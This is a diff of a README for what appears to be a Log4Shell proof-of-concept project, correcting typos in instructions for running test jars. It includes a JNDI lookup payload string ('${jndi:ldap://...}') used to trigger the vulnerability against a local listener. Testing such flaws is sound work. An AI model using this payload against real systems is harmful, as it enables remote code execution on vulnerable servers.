s-retlaw/l4s_poc_jars/README.md

 java -jar l4sclients-0.1-all.jar [PORT]

 This will default to port 8888 and will log the header log_me
-If not found we look for a header log_me_b64 and base64 decode this and log that.
+If not found we look for a header log_me_b64 and base64 decode that header and log it.

 ### CmdLine
 You can also run a CmdLine that will log the first param passed in.
 java -cp l4sclients-0.1-all.jar Log4jCmdLine '${jndi:ldap://127.0.0.1:1389/#MM_127_0_0_1_4444}'

-Note this is the sam ejar but run as a classpath entry with an explict class listed.
+Note this is the same jar but run as a classpath entry with an explict class listed.

 ## Utils Jar